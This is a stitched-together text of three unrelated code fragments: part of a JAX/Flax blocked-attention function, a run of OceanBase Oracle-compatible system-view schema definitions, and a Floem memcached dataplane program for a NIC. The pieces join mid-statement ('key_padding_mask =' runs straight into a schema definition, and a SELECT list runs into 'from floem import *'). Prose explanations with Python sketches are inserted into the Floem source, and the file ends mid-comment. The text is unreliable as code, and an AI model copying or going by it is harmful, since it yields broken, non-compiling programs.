bias_init: initializer for the bias of the Dense layers.
bias: bool: whether pointwise QKVO dense transforms use bias.
block_size: int, block size.
Returns:
output of shape `[bs, dim1, dim2, ..., dimN, features]`.
"""
orig_seqlen = inputs_q.shape[-2]
logging.info(inputs_q)
extra_len = block_size - (orig_seqlen % block_size)
pad_width = jnp.array([[0, 0], [0, extra_len], [0, 0]])
mask_pad = jnp.array([[0, 0], [0, extra_len], [0, 0]])
inputs_q = jnp.pad(inputs_q, pad_width)
if inputs_kv is not None:
inputs_kv = jnp.pad(inputs_kv, pad_width)
# logging.info(padding_mask)
padding_mask = jnp.pad(padding_mask, mask_pad, constant_values=-1e9)
# logging.info(inputs_q)
assert causal_mask or not cache, (
'Caching is only supported for causal attention.')
assert inputs_q.ndim == 3
if inputs_kv is None:
inputs_kv = inputs_q
if attention_axis is None:
attention_axis = tuple(range(1, inputs_q.ndim - 1))
features = out_features or inputs_q.shape[-1]
qkv_features = qkv_features or inputs_q.shape[-1]
assert qkv_features % num_heads == 0, (
'Memory dimension must be divisible by number of heads.')
head_dim = qkv_features // num_heads
dense = nn.DenseGeneral.partial(
axis=-1,
features=(num_heads, head_dim),
kernel_init=kernel_init,
bias_init=bias_init,
bias=bias,
precision=precision)
# project inputs_q to multi-headed q/k/v
# dimensions are then [bs, dims..., n_heads, n_features_per_head]
qlength = inputs_q.shape[-2]
bs = inputs_q.shape[0]
kvlength = inputs_kv.shape[-2]
query, key, value = (dense(inputs_q, dtype=dtype, name='query'),
dense(inputs_kv, dtype=dtype, name='key'),
dense(inputs_kv, dtype=dtype, name='value'))
if cache:
assert isinstance(cache, Cache), 'cache must be an instance of Cache'
if self.is_initializing():
cache.store(onp.array((key.ndim,) + key.shape[-2:], dtype=onp.int32))
else:
cache_entry = cache.retrieve(None)
expected_shape = list(cache_entry.key.shape[:-2])
for attn_dim in attention_axis:
expected_shape[attn_dim] = 1
expected_shape = tuple(expected_shape) + inputs_q.shape[-1:]
if expected_shape != inputs_q.shape:
raise ValueError('Invalid shape provided, '
'expected shape %s instead got %s.' %
(expected_shape, inputs_q.shape))
if not isinstance(cache_entry, _CacheEntry):
raise ValueError('Cache is not initialized.')
cshape = cache_entry.key.shape
indices = [0] * len(cshape)
i = cache_entry.i
attn_size = onp.prod(onp.take(cshape, attention_axis))
for attn_dim in attention_axis:
attn_size //= cshape[attn_dim]
indices[attn_dim] = i // attn_size
i = i % attn_size
key = lax.dynamic_update_slice(cache_entry.key, key, indices)
value = lax.dynamic_update_slice(cache_entry.value, value, indices)
one = jnp.array(1, jnp.uint32)
cache_entry = cache_entry.replace(i=cache_entry.i + one,
key=key,
value=value)
cache.store(cache_entry)
key_padding_mask =
'OB_ORA_SYS_DATABASE_ID',
table_id = '25100',
table_type = 'SYSTEM_VIEW',
rowkey_columns = [],
normal_columns = [],
gm_columns = [],
in_tenant_space = True,
view_definition = """
SELECT
CAST(NULL AS VARCHAR2(30)) AS JOB_NAME,
CAST(NULL AS VARCHAR2(30)) AS ARGUMENT_NAME,
CAST(NULL AS NUMBER) AS ARGUMENT_POSITION,
CAST(NULL AS VARCHAR2(61)) AS ARGUMENT_TYPE,
CAST(NULL AS VARCHAR2(4000)) AS VALUE,
CAST(NULL as /* TODO: RAW */ VARCHAR(128)) AS DEFAULT_ANYDATA_VALUE,
CAST(NULL AS VARCHAR2(5)) AS OUT_ARGUMENT
FROM
DUAL
WHERE
1 = 0
""".replace("\n", " ")
)
def_table_schema(
table_name = "ALL_ERRORS",
name_postfix = "_ORA",
database_id = 'OB_ORA_SYS_DATABASE_ID',
table_id = '25101',
table_type = 'SYSTEM_VIEW',
rowkey_columns = [],
normal_columns = [],
gm_columns = [],
in_tenant_space = True,
view_definition = """
SELECT
CAST(o.owner AS VARCHAR2(128)) AS OWNER,
CAST(o.object_name AS VARCHAR2(128)) AS NAME,
CAST(o.object_type AS VARCHAR2(19)) AS TYPE,
CAST(e.obj_seq AS NUMBER) AS SEQUENCE,
CAST(e.line AS NUMBER) AS LINE,
CAST(e.position AS NUMBER) AS POSITION,
CAST(e.text as VARCHAR2(4000)) AS TEXT,
CAST(DECODE(e.property, 0, 'ERROR', 1, 'WARNING', 'UNDEFINED') AS VARCHAR2(9)) AS ATTRIBUTE,
CAST(e.error_number AS NUMBER) AS MESSAGE_NUMBER
FROM
all_objects o,
(select obj_id, obj_seq, line, position, text, property, error_number, CAST( UPPER(decode(obj_type,
3, 'PACKAGE',
4, 'TYPE',
5, 'PACKAGE BODY',
6, 'TYPE BODY',
7, 'TRIGGER',
8, 'VIEW',
9, 'FUNCTION',
12, 'PROCEDURE',
'MAXTYPE')) AS VARCHAR2(23)) object_type from sys.ALL_VIRTUAL_TENANT_ERROR_REAL_AGENT
WHERE TENANT_ID = EFFECTIVE_TENANT_ID()) e
WHERE
o.object_id = e.obj_id
AND o.object_type like e.object_type
AND o.object_type IN (UPPER('package'),
UPPER('type'),
UPPER('procedure'),
UPPER('function'),
UPPER('package body'),
UPPER('view'),
UPPER('trigger'),
UPPER('type body'),
UPPER('library'),
UPPER('queue'),
UPPER('java source'),
UPPER('java class'),
UPPER('dimension'),
UPPER('assembly'),
UPPER('hierarchy'),
UPPER('attribute dimension'),
UPPER('analytic view'))
""".replace("\n", " ")
)
def_table_schema(
table_name = "DBA_ERRORS",
name_postfix = "_ORA",
database_id = 'OB_ORA_SYS_DATABASE_ID',
table_id = '25102',
table_type = 'SYSTEM_VIEW',
rowkey_columns = [],
normal_columns = [],
gm_columns = [],
in_tenant_space = True,
view_definition = """
SELECT
CAST(o.owner AS VARCHAR2(128)) AS OWNER,
CAST(o.object_name AS VARCHAR2(128)) AS NAME,
CAST(o.object_type AS VARCHAR2(19)) AS TYPE,
CAST(e.obj_seq AS NUMBER) AS SEQUENCE,
CAST(e.line AS NUMBER) AS LINE,
CAST(e.position AS NUMBER) AS POSITION,
CAST(e.text as VARCHAR2(4000)) AS TEXT,
CAST(DECODE(e.property, 0, 'ERROR', 1, 'WARNING', 'UNDEFINED') AS VARCHAR2(9)) AS ATTRIBUTE,
CAST(e.error_number AS NUMBER) AS MESSAGE_NUMBER
FROM
all_objects o,
(select obj_id, obj_seq, line, position, text, property, error_number, CAST( UPPER(decode(obj_type,
3, 'PACKAGE',
4, 'TYPE',
5, 'PACKAGE BODY',
6, 'TYPE BODY',
7, 'TRIGGER',
8, 'VIEW',
9, 'FUNCTION',
12, 'PROCEDURE',
'MAXTYPE')) AS VARCHAR2(23)) object_type from sys.ALL_VIRTUAL_TENANT_ERROR_REAL_AGENT
WHERE TENANT_ID = EFFECTIVE_TENANT_ID()) e
WHERE
o.object_id = e.obj_id
AND o.object_type like e.object_type
AND o.object_type IN (UPPER('package'),
UPPER('type'),
UPPER('procedure'),
UPPER('function'),
UPPER('package body'),
UPPER('view'),
UPPER('trigger'),
UPPER('type body'),
UPPER('library'),
UPPER('queue'),
UPPER('java source'),
UPPER('java class'),
UPPER('dimension'),
UPPER('assembly'),
UPPER('hierarchy'),
UPPER('attribute dimension'),
UPPER('analytic view'))
""".replace("\n", " ")
)
def_table_schema(
table_name = "USER_ERRORS",
name_postfix = "_ORA",
database_id = 'OB_ORA_SYS_DATABASE_ID',
table_id = '25103',
table_type = 'SYSTEM_VIEW',
rowkey_columns = [],
normal_columns = [],
gm_columns = [],
in_tenant_space = True,
view_definition = """
SELECT
CAST(o.owner AS VARCHAR2(128)) AS OWNER,
CAST(o.object_name AS VARCHAR2(128)) AS NAME,
CAST(o.object_type AS VARCHAR2(19)) AS TYPE,
CAST(e.obj_seq AS NUMBER) AS SEQUENCE,
CAST(e.line AS NUMBER) AS LINE,
CAST(e.position AS NUMBER) AS POSITION,
CAST(e.text as VARCHAR2(4000)) AS TEXT,
CAST(DECODE(e.property, 0, 'ERROR', 1, 'WARNING', 'UNDEFINED') AS VARCHAR2(9)) AS ATTRIBUTE,
CAST(e.error_number AS NUMBER) AS MESSAGE_NUMBER
FROM
all_objects o,
(select obj_id, obj_seq, line, position, text, property, error_number, CAST( UPPER(decode(obj_type,
3, 'PACKAGE',
4, 'TYPE',
5, 'PACKAGE BODY',
6, 'TYPE BODY',
7, 'TRIGGER',
8, 'VIEW',
9, 'FUNCTION',
12, 'PROCEDURE',
'MAXTYPE')) AS VARCHAR2(23)) object_type from sys.ALL_VIRTUAL_TENANT_ERROR_REAL_AGENT
WHERE TENANT_ID = EFFECTIVE_TENANT_ID()) e,
all_users u
WHERE
o.object_id = e.obj_id
AND o.object_type like e.object_type
AND o.object_type IN (UPPER('package'),
UPPER('type'),
UPPER('procedure'),
UPPER('function'),
UPPER('package body'),
UPPER('view'),
UPPER('trigger'),
UPPER('type body'),
UPPER('library'),
UPPER('queue'),
UPPER('java source'),
UPPER('java class'),
UPPER('dimension'),
UPPER('assembly'),
UPPER('hierarchy'),
UPPER('attribute dimension'),
UPPER('analytic view'))
AND u.username=o.owner
AND u.userid IN (USERENV('SCHEMAID'))
""".replace("\n", " ")
)
def_table_schema(
table_name = "ALL_TYPE_METHODS",
name_postfix = "_ORA",
database_id = 'OB_ORA_SYS_DATABASE_ID',
table_id = '25104',
table_type = 'SYSTEM_VIEW',
rowkey_columns = [],
normal_columns = [],
gm_columns = [],
in_tenant_space = True,
view_definition = """
SELECT
CAST(NULL AS VARCHAR2(30)) AS OWNER,
CAST(NULL AS VARCHAR2(30)) AS TYPE_NAME,
CAST(NULL AS VARCHAR2(30)) AS METHOD_NAME,
CAST(NULL AS NUMBER) AS METHOD_NO,
CAST(NULL AS VARCHAR2(6)) AS METHOD_TYPE,
CAST(NULL AS NUMBER) AS PARAMETERS,
CAST(NULL AS NUMBER) AS RESULTS,
CAST(NULL AS VARCHAR2(3)) AS FINAL,
CAST(NULL AS VARCHAR2(3)) AS INSTANTIABLE,
CAST(NULL AS VARCHAR2(3)) AS OVERRIDING,
CAST(NULL AS VARCHAR2(3)) AS INHERITED
FROM
DUAL
WHERE
1 = 0
""".replace("\n", " ")
)
def_table_schema(
table_name = "DBA_TYPE_METHODS",
name_postfix = "_ORA",
database_id = 'OB_ORA_SYS_DATABASE_ID',
table_id = '25105',
table_type = 'SYSTEM_VIEW',
rowkey_columns = [],
normal_columns = [],
gm_columns = [],
in_tenant_space = True,
view_definition = """
SELECT
CAST(NULL AS VARCHAR2(30)) AS OWNER,
CAST(NULL AS VARCHAR2(30)) AS TYPE_NAME,
CAST(NULL AS VARCHAR2(30)) AS METHOD_NAME,
CAST(NULL AS NUMBER) AS METHOD_NO,
CAST(NULL AS VARCHAR2(6)) AS METHOD_TYPE,
CAST(NULL AS NUMBER) AS PARAMETERS,
CAST(NULL AS NUMBER) AS RESULTS,
CAST(NULL AS VARCHAR2(3)) AS FINAL,
CAST(NULL AS VARCHAR2(3)) AS INSTANTIABLE,
CAST(NULL AS VARCHAR2(3)) AS OVERRIDING,
CAST(NULL AS VARCHAR2(3)) AS INHERITED
FROM
DUAL
WHERE
1 = 0
""".replace("\n", " ")
)
def_table_schema(
table_name = "USER_TYPE_METHODS",
name_postfix = "_ORA",
database_id = 'OB_ORA_SYS_DATABASE_ID',
table_id = '25106',
table_type = 'SYSTEM_VIEW',
rowkey_columns = [],
normal_columns = [],
gm_columns = [],
in_tenant_space = True,
view_definition = """
SELECT
CAST(NULL AS VARCHAR2(30)) AS TYPE_NAME,
CAST(NULL AS VARCHAR2(30)) AS METHOD_NAME,
CAST(NULL AS NUMBER) AS METHOD_NO,
CAST(NULL AS VARCHAR2(6)) AS METHOD_TYPE,
CAST(NULL AS NUMBER) AS PARAMETERS,
CAST(NULL AS NUMBER) AS RESULTS,
CAST(NULL AS VARCHAR2(3)) AS FINAL,
CAST(NULL AS VARCHAR2(3)) AS INSTANTIABLE,
CAST(NULL AS VARCHAR2(3)) AS OVERRIDING,
CAST(NULL AS VARCHAR2(3)) AS INHERITED
FROM
DUAL
WHERE
1 = 0
""".replace("\n", " ")
)
def_table_schema(
table_name = "ALL_METHOD_PARAMS",
name_postfix = "_ORA",
database_id = 'OB_ORA_SYS_DATABASE_ID',
table_id = '25107',
table_type = 'SYSTEM_VIEW',
rowkey_columns = [],
normal_columns = [],
gm_columns = [],
in_tenant_space = True,
view_definition = """
SELECT
CAST(NULL AS VARCHAR2(30)) AS OWNER,
CAST(NULL AS VARCHAR2(30)) AS TYPE_NAME,
CAST(NULL AS VARCHAR2(30)) AS METHOD_NAME,
CAST(NULL AS NUMBER) AS METHOD_NO,
CAST(NULL AS VARCHAR2(30)) AS PARAM_NAME,
CAST(NULL AS NUMBER) AS PARAM_NO,
CAST(NULL AS VARCHAR2(6)) AS PARAM_MODE,
CAST(NULL AS VARCHAR2(7)) AS PARAM_TYPE_MOD,
CAST(NULL AS VARCHAR2(30)) AS PARAM_TYPE_OWNER,
CAST(NULL AS VARCHAR2(30)) AS PARAM_TYPE_NAME,
CAST(NULL AS VARCHAR2(44)) AS CHARACTER_SET_NAME
FROM
DUAL
WHERE
1 = 0
""".replace("\n", " ")
)
def_table_schema(
table_name = "DBA_METHOD_PARAMS",
name_postfix = "_ORA",
database_id = 'OB_ORA_SYS_DATABASE_ID',
table_id = '25108',
table_type = 'SYSTEM_VIEW',
rowkey_columns = [],
normal_columns = [],
gm_columns = [],
in_tenant_space = True,
view_definition = """
SELECT
CAST(NULL AS VARCHAR2(30)) AS OWNER,
CAST(NULL AS VARCHAR2(30)) AS TYPE_NAME,
CAST(NULL AS VARCHAR2(30)) AS METHOD_NAME,
CAST(NULL AS NUMBER) AS METHOD_NO,
CAST(NULL AS VARCHAR2(30)) AS PARAM_NAME,
CAST(NULL AS NUMBER) AS PARAM_NO,
CAST(NULL AS VARCHAR2(6)) AS PARAM_MODE,
CAST(NULL AS VARCHAR2(7)) AS PARAM_TYPE_MOD,
CAST(NULL AS VARCHAR2(30)) AS PARAM_TYPE_OWNER,
CAST(NULL AS VARCHAR2(30)) AS PARAM_TYPE_NAME,
CAST(NULL AS VARCHAR2(44)) AS CHARACTER_SET_NAME
FROM
DUAL
WHERE
1 = 0
""".replace("\n", " ")
)
def_table_schema(
table_name = "USER_METHOD_PARAMS",
name_postfix = "_ORA",
database_id = 'OB_ORA_SYS_DATABASE_ID',
table_id = '25109',
table_type = 'SYSTEM_VIEW',
rowkey_columns = [],
normal_columns = [],
gm_columns = [],
in_tenant_space = True,
view_definition = """
SELECT
CAST(NULL AS VARCHAR2(30)) AS TYPE_NAME,
CAST(NULL AS VARCHAR2(30)) AS METHOD_NAME,
CAST(NULL AS NUMBER) AS METHOD_NO,
CAST(NULL AS VARCHAR2(30)) AS PARAM_NAME,
CAST(NULL AS NUMBER) AS PARAM_NO,
CAST(NULL AS VARCHAR2(6)) AS PARAM_MODE,
CAST(NULL AS VARCHAR2(7)) AS PARAM_TYPE_MOD,
CAST(NULL AS VARCHAR2(30)) AS PARAM_TYPE_OWNER,
CAST(NULL AS VARCHAR2(30)) AS PARAM_TYPE_NAME,
CAST(NULL AS VARCHAR2(44)) AS CHARACTER_SET_NAME
FROM
DUAL
WHERE
1 = 0
""".replace("\n", " ")
)
def_table_schema(
table_name = 'DBA_TABLESPACES',
name_postfix = '_ORA',
database_id = 'OB_ORA_SYS_DATABASE_ID',
table_id = '25110',
table_type = 'SYSTEM_VIEW',
rowkey_columns = [],
normal_columns = [],
gm_columns = [],
in_tenant_space = True,
view_definition = """SELECT
TABLESPACE_NAME,
CAST(NULL AS NUMBER) BLOCK_SIZE,
CAST(NULL AS NUMBER) INITIAL_EXTENT,
CAST(NULL AS NUMBER) NEXT_EXTENT,
CAST(NULL AS NUMBER) MIN_EXTENT,
CAST(NULL AS NUMBER) MAX_EXTENT,
CAST(NULL AS NUMBER) MAX_SIZE,
CAST(NULL AS NUMBER) PCT_INCREASE,
CAST(NULL AS NUMBER) MIN_EXTLEN,
CAST(NULL AS VARCHAR2(9)) STATUS,
CAST(NULL AS VARCHAR2(9)) CONTENTS,
CAST(NULL AS VARCHAR2(9)) LOGGING,
CAST(NULL AS VARCHAR2(3)) FORCE_LOGGING,
CAST(NULL AS VARCHAR2(10)) EXTENT_MANAGEMENT,
CAST(NULL AS VARCHAR2(9)) ALLOCATION_TYPE,
CAST(NULL AS VARCHAR2(3)) PLUGGED_IN,
CAST(NULL AS VARCHAR2(6)) SEGMENT_SPACE_MANAGEMENT,
CAST(NULL AS VARCHAR2(8)) DEF_TAB_COMPRESSION,
CAST(NULL AS VARCHAR2(11)) RETENTION,
CAST(NULL AS VARCHAR2(3)) BIGFILE,
CAST(NULL AS VARCHAR2(7)) PREDICATE_EVALUATION,
CAST(NULL AS VARCHAR2(3)) ENCRYPTED,
CAST(NULL AS VARCHAR2(12)) COMPRESS_FOR
FROM
SYS.ALL_VIRTUAL_TENANT_TABLESPACE_REAL_AGENT
WHERE TENANT_ID = EFFECTIVE_TENANT_ID()
""".replace("\n", " ")
)
def_table_schema(
table_name = 'USER_TABLESPACES',
name_postfix = '_ORA',
database_id = 'OB_ORA_SYS_DATABASE_ID',
table_id = '25111',
table_type = 'SYSTEM_VIEW',
rowkey_columns = [],
normal_columns = [],
gm_columns = [],
in_tenant_space = True,
view_definition = """SELECT
TABLESPACE_NAME,
CAST(NULL AS NUMBER) BLOCK_SIZE,
CAST(NULL AS NUMBER) INITIAL_EXTENT,
CAST(NULL AS NUMBER) NEXT_EXTENT,
CAST(NULL AS NUMBER) MIN_EXTENT,
CAST(NULL AS NUMBER) MAX_EXTENT,
CAST(NULL AS NUMBER) MAX_SIZE,
CAST(NULL AS NUMBER) PCT_INCREASE,
CAST(NULL AS NUMBER) MIN_EXTLEN,
CAST(NULL AS VARCHAR2(9)) STATUS,
CAST(NULL AS VARCHAR2(9))
from floem import *
n_cores = 1
nic_rx_threads = 10
nic_tx_threads = 1
rx_queues = 1
tx_queues = 1
#mode = 'dpdk'
mode = target.CAVIUM
class protocol_binary_request_header_request(State):
magic = Field(Uint(8))
opcode = Field(Uint(8))
keylen = Field(Uint(16))
extlen = Field(Uint(8))
datatype = Field(Uint(8))
status = Field(Uint(16))
bodylen = Field(Uint(32))
opaque = Field(Uint(32))
cas = Field(Uint(64))
# Tell compiler not to generate this struct because it's already declared in some other header file.
def init(self): self.declare = False
class protocol_binary_request_header(State):
request = Field(protocol_binary_request_header_request)
def init(self): self.declare = False
class iokvs_message(State):
ether = Field('struct eth_hdr')
ipv4 = Field('struct ip_hdr')
udp = Field('struct udp_hdr')
mcudp = Field('memcached_udp_header')
mcr = Field(protocol_binary_request_header)
payload = Field(Array(Uint(8)))
def init(self): self.declare = False
CacheGetStart, CacheGetEnd, CacheSetStart, CacheSetEnd, CacheState = \
cache_smart.smart_cache_with_state('MyCache',
(Pointer(Int),'key','keylen'), [(Pointer(Int),'val','vallen')],
var_size=True, hash_value='hash', n_hashes=2**13,
write_policy=Cache.write_back, write_miss=Cache.write_alloc)
class item(State):
next = Field('struct _item*')
hv = Field(Uint(32))
vallen = Field(Uint(32))
refcount = Field(Uint(16))
keylen = Field(Uint(16))
flags = Field(Uint(32))
def init(self): self.declare = False
class MyState(CacheState):
pkt = Field(Pointer(iokvs_message), size='sizeof(struct eth_hdr) + sizeof(struct ip_hdr)')
pkt_buff = Field('void*')
it = Field(Pointer(item))
hash = Field(Uint(32))
keylen = Field(Uint(32))
key = Field('void*', size='state->keylen')
vallen = Field(Uint(32))
val = Field('void*', size='state->vallen')
class Schedule(State):
core = Field(Int)
def init(self): self.core = 0
class ItemAllocators(State):
ia = Field('struct item_allocator*')
def init(self):
self.ia = 'get_item_allocators()'
item_allocators = ItemAllocators()
class segments_holder(State):
segbase = Field(Uint(64))
seglen = Field(Uint(64))
offset = Field(Uint(64))
next = Field('struct _segments_holder*')
last = Field('struct _segments_holder*')
class main(Flow):
state = PerPacket(MyState)
class SaveState(Element):
def configure(self):
self.inp = Input(SizeT, "void *", "void *")
self.out = Output()
def impl(self):
self.run_c(r'''
(size_t size, void* pkt, void* buff) = inp();
iokvs_message* m = (iokvs_message*) pkt;
state->pkt = m;
state->pkt_buff = buff;
output { out(); }
''')
class GetPktBuff(Element):
def configure(self):
self.inp = Input()
self.out = Output("void*", "void*")
def impl(self):
self.run_c(r'''
void* pkt = state->pkt;
void* pkt_buff = state->pkt_buff;
output { out(pkt, pkt_buff); }
''')
class CheckPacket(Element):
def configure(self):
self.inp = Input(SizeT, 'void*', 'void*')
self.out = Output(SizeT, 'void*', 'void*')
self.slowpath = Output( 'void*', 'void*')
self.drop = Output('void*', 'void*')
def impl(self):
self.run_c(r'''
(size_t msglen, void* pkt, void* buff) = inp();
iokvs_message* m = (iokvs_message*) pkt;
int type; // 0 = normal, 1 = slow, 2 = drop
if (m->ether.type == htons(ETHERTYPE_IPv4) &&
m->ipv4._proto == 17 &&
memcmp(m->ipv4.dest.addr, settings.localip.addr, sizeof(struct ip_addr)) == 0 &&
m->udp.dest_port == htons(11211) &&
msglen >= sizeof(iokvs_message))
{
uint32_t blen = m->mcr.request.bodylen;
uint32_t keylen = m->mcr.request.keylen;
/* Ensure request is complete */
if (blen < keylen + m->mcr.request.extlen ||
msglen < sizeof(iokvs_message) + blen) {
type = 2;
}
else if (m->mcudp.n_data != htons(1)) {
type = 2;
}
else if (m->mcr.request.opcode != PROTOCOL_BINARY_CMD_GET &&
m->mcr.request.opcode != PROTOCOL_BINARY_CMD_SET) {
type = 2;
}
else {
type = 0;
}
} else {
type = 1;
}
output switch {
case type==0: out(msglen, m, buff);
case type==1: slowpath(m, buff);
else: drop(m, buff);
}
''')
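CheckPacket only accepts a request when the body length covers the key and extras and the datagram holds the whole body. That completeness test can be sketched standalone in Python (the header size below is a placeholder, not the real `sizeof(iokvs_message)`, which depends on the packed C struct layout):

```python
def request_is_complete(msglen, bodylen, keylen, extlen, header_size=48):
    """True when a memcached binary request fits entirely in the datagram.

    header_size stands in for sizeof(iokvs_message); the real value is
    determined by the C struct definition, so this is an assumption.
    """
    if bodylen < keylen + extlen:
        return False  # body can't even hold key + extras
    return msglen >= header_size + bodylen
```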
class Classifier(Element):
def configure(self):
self.inp = Input()
self.out_get = Output('uint8_t*', Int)
self.out_set = Output('uint8_t*', Int, Int, 'uint8_t*')
def impl(self):
self.run_c(r'''
uint8_t cmd = state->pkt->mcr.request.opcode;
//printf("receive: %d\n", cmd);
output switch{
case (cmd == PROTOCOL_BINARY_CMD_GET): out_get();
case (cmd == PROTOCOL_BINARY_CMD_SET): out_set();
// else drop
}
''')
class GetKey(ElementOneInOut):
def impl(self):
self.run_c(r'''
state->key = state->pkt->payload + state->pkt->mcr.request.extlen;
output { out(); }''')
class RxScheduler(Element):
def configure(self):
self.inp = Input(Int)
self.out = Output(Int)
def impl(self):
self.run_c(r'''
(int id) = inp();
static __thread int qid = -1;
if(qid == -1) qid = (id * %d) / %d;
qid = (qid + 1) %s %d;
output { out(qid); }
''' % (rx_queues, n_cores, '%', rx_queues))
class TxScheduler(Element):
def configure(self):
self.inp = Input(Int)
self.out = Output(Int)
def impl(self):
self.run_c(r'''
(int id) = inp();
static __thread int qid = -1;
if(qid == -1) qid = (id * %d) / %d;
qid = (qid + 1) %s %d;
output { out(qid); }
''' % (tx_queues, nic_tx_threads, '%', tx_queues))
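RxScheduler and TxScheduler both seed a per-thread queue index from the thread id, then advance it round-robin modulo the queue count. A standalone sketch of that policy (function names are illustrative):

```python
def make_scheduler(thread_id, n_threads, n_queues):
    """Round-robin queue picker; each thread starts in its own partition."""
    # Initial partition, like (id * queues) / threads in the C element.
    qid = (thread_id * n_queues) // n_threads

    def next_queue():
        nonlocal qid
        qid = (qid + 1) % n_queues  # advance round-robin, like (qid + 1) % queues
        return qid

    return next_queue
```

With 2 threads and 4 queues, thread 0 cycles 1, 2, 3, 0, … while thread 1 starts from its own partition at qid 2.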
######################## hash ########################
class JenkinsHash(ElementOneInOut):
def impl(self):
self.run_c(r'''
//state->hash = jenkins_hash(state->key, state->pkt->mcr.request.keylen);
uint32_t *key = state->key;
state->hash = cm_hash4(*key);
//printf("hash = %d\n", hash);
output { out(); }
''')
class QID(ElementOneInOut):
def impl(self):
self.run_c(r'''
state->qid = state->hash %s %d;
output { out(); }
''' % ('%', rx_queues))
class QIDCPU(ElementOneInOut):
def impl(self):
self.run_c(r'''
state->qid = state->hash %s %d;
output { out(); }
''' % ('%', tx_queues))
class HashGet(Element):
def configure(self):
self.inp = Input()
self.out = Output()
def impl(self):
self.run_c(r'''
item* it = hasht_get(state->key, state->keylen, state->hash);
//printf("hash get\n");
state->it = it;
if(it) {
state->val = item_value(it);
state->vallen = it->vallen;
} else {
state->vallen = 0;
}
output { out(); }
''')
class GetResult(Element):
def configure(self):
self.inp = Input()
self.hit = Output()
self.miss = Output()
def impl(self):
self.run_c(r'''
bool yes = (state->vallen > 0);
output switch { case yes: hit(); else: miss(); }
''')
class HashPut(ElementOneInOut):
def impl(self):
self.run_c(r'''
//printf("hash put\n");
if(state->it) hasht_put(state->it, NULL);
output { out(); }
''')
######################## responses ########################
class SizeGetResp(Element):
def configure(self):
self.inp = Input()
self.out = Output(SizeT)
def impl(self):
self.run_c(r'''
//printf("size get\n");
size_t msglen = sizeof(iokvs_message) + 4 + state->vallen;
output { out(msglen); }
''')
class PrepareGetResp(Element):
def configure(self):
self.inp = Input(SizeT, 'void*', 'void*')
self.out = Output(SizeT, Pointer(iokvs_message), 'void*')
def impl(self):
self.run_c(r'''
(size_t msglen, void* pkt, void* pkt_buff) = inp();
iokvs_message *m = pkt;
memcpy(m, state->pkt, sizeof(struct eth_hdr) + sizeof(struct ip_hdr));
m->mcr.request.magic = PROTOCOL_BINARY_RES;
m->mcr.request.opcode = PROTOCOL_BINARY_CMD_GET;
m->mcr.request.datatype = PROTOCOL_BINARY_RAW_BYTES;
m->mcr.request.status = PROTOCOL_BINARY_RESPONSE_SUCCESS;
m->mcr.request.keylen = 0;
m->mcr.request.extlen = 4;
m->mcr.request.bodylen = 4;
*((uint32_t *)m->payload) = 0;
m->mcr.request.bodylen = 4 + state->vallen;
memcpy(m->payload + 4, state->val, state->vallen);
output { out(msglen, m, pkt_buff); }
''')
class SizeGetNullResp(Element):
def configure(self):
self.inp = Input()
self.out = Output(SizeT)
def impl(self):
self.run_c(r'''
//printf("size get null\n");
size_t msglen = sizeof(iokvs_message) + 4;
output { out(msglen); }
''')
class PrepareGetNullResp(Element):
def configure(self):
self.inp = Input(SizeT, 'void*', 'void*')
self.out = Output(SizeT, Pointer(iokvs_message), 'void*')
def impl(self):
self.run_c(r'''
(size_t msglen, void* pkt, void* pkt_buff) = inp();
iokvs_message *m = pkt;
memcpy(m, state->pkt, sizeof(struct eth_hdr) + sizeof(struct ip_hdr));
m->mcr.request.magic = PROTOCOL_BINARY_RES;
m->mcr.request.opcode = PROTOCOL_BINARY_CMD_GET;
m->mcr.request.datatype = PROTOCOL_BINARY_RAW_BYTES;
m->mcr.request.status = PROTOCOL_BINARY_RESPONSE_KEY_ENOENT;
m->mcr.request.keylen = 0;
m->mcr.request.extlen = 4;
m->mcr.request.bodylen = 4;
*((uint32_t *)m->payload) = 0;
output { out(msglen, m, pkt_buff); }
''')
class SizeSetResp(Element):
def configure(self):
self.inp = Input()
self.out = Output(SizeT)
def impl(self):
self.run_c(r'''
//printf("size set\n");
size_t msglen = sizeof(iokvs_message) + 4;
output { out(msglen); }
''')
class SizePktBuffSetResp(Element):
def configure(self):
self.inp = Input()
self.out = Output(SizeT, 'void*', 'void*')
def impl(self):
self.run_c(r'''
size_t msglen = sizeof(iokvs_message) + 4;
void* pkt = state->pkt;
void* pkt_buff = state->pkt_buff;
output { out(msglen, pkt, pkt_buff); }
''')
class PrepareSetResp(Element):
def configure(self, status):
self.inp = Input(SizeT, 'void*', 'void*')
self.out = Output(SizeT, Pointer(iokvs_message), 'void*')
self.status = status
# PROTOCOL_BINARY_RESPONSE_SUCCESS
# PROTOCOL_BINARY_RESPONSE_ENOMEM
def impl(self):
self.run_c(r'''
(size_t msglen, void* pkt, void* pkt_buff) = inp();
iokvs_message *m = pkt;
memcpy(m, state->pkt, sizeof(struct eth_hdr) + sizeof(struct ip_hdr));
m->mcr.request.magic = PROTOCOL_BINARY_RES;
m->mcr.request.opcode = PROTOCOL_BINARY_CMD_SET;
m->mcr.request.datatype = PROTOCOL_BINARY_RAW_BYTES;
m->mcr.request.status = %s;
m->mcr.request.keylen = 0;
m->mcr.request.extlen = 0;
m->mcr.request.bodylen = 0;
output { out(msglen, m, pkt_buff); }
''' % self.status)
class PktBuff(Element):
def configure(self):
self.inp = Input()
self.out = Output('void*', 'void*')
def impl(self):
self.run_c(r'''
void* pkt = state->pkt;
void* pkt_buff = state->pkt_buff;
output { out(pkt, pkt_buff); }
''')
class PrepareHeader(Element):
def configure(self):
self.inp = Input(SizeT, Pointer(iokvs_message), "void *")
self.out = Output(SizeT, "void *", "void *")
def impl(self):
self.run_c(r'''
(size_t msglen, iokvs_message* m, void* buff) = inp();
struct eth_addr mymac = m->ether.dest;
m->ether.dest = m->ether.src;
m->ether.src = mymac;
m->ipv4.dest = m->ipv4.src;
m->ipv4.src = settings.localip;
m->ipv4._len = htons(msglen - offsetof(iokvs_message, ipv4));
m->ipv4._ttl = 64;
m->ipv4._chksum = 0;
m->udp.dest_port = m->udp.src_port;
m->udp.src_port = htons(11211);
m->udp.len = htons(msglen - offsetof(iokvs_message, udp));
m->udp.cksum = 0;
output { out(msglen, (void*) m, buff); }
''')
class HandleArp(Element):
def configure(self):
self.inp = Input("void *", "void *")
self.out = Output(SizeT, "void *", "void *")
self.drop = Output("void *", "void *")
def impl(self):
self.run_c(r'''
(void* pkt, void* buff) = inp();
iokvs_message* msg = (iokvs_message*) pkt;
struct arp_hdr *arp = (struct arp_hdr *) (&msg->ether + 1);
int resp = 0;
/* Currently we're only handling ARP here */
